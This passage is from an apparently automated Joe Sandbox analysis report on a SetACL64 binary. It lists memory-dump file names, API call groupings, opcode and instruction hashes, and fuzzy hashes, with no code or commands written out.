                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
                                        • String ID:
                                        • API String ID: 2384231905-0
                                        • Opcode ID: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                                        • Instruction ID: f7628ec9d9e294fb19bf9303db138274345bb7d7a282b4d15a6f13d8164fcce6
                                        • Opcode Fuzzy Hash: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                                        • Instruction Fuzzy Hash: C7816EA2B18642C1EA109B25E45936D6252BF84BE8F40423DDB5E877E9DF3EDC84C760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                                        • String ID:
                                        • API String ID: 3702003507-0
                                        • Opcode ID: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                                        • Instruction ID: 33b01e2f854d43ca47ac46108accfcf7d7aae661711a8b56741e44fa92e6f5de
                                        • Opcode Fuzzy Hash: 5295a9cf4f159f187b6dae6dfa2a8d35e0ab65163286308850760d8e3341d609
                                        • Instruction Fuzzy Hash: D8317EE1A4DA42C1EB15DB55E6400B96360FF85B94F18013ADB8D8B795DE6EEC41C320
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Resource$FindFreeLoadLockQueryValue_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 678723381-0
                                        • Opcode ID: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                        • Instruction ID: 7ba90ef05a520d13f77c55ab4759998f6c38476586eb46ada0c00af0494d935f
                                        • Opcode Fuzzy Hash: ccf424d7a3e64a52a3ff587554103de86ea84168affc70f79e39ce00dd8ec87e
                                        • Instruction Fuzzy Hash: 34419062A19B85C1EA108B24E64536A6361FF85BE4F144238EB9D46AAADF3DF580C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                        • API String ID: 3215553584-1196891531
                                        • Opcode ID: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                                        • Instruction ID: 8479071785c1584bc1d57f0a077ad4f29f449b10880987e4c186d243a6ac13f6
                                        • Opcode Fuzzy Hash: 1bb88c3171e5cf5bbab3d2ebdd36e20614571ae61b64ac2c66acfc21f2ce36b7
                                        • Instruction Fuzzy Hash: B08192F2E8C642C6FA654EA9855027826A0FF1AB44F55803DDA4DE72A5CF2FEC01D721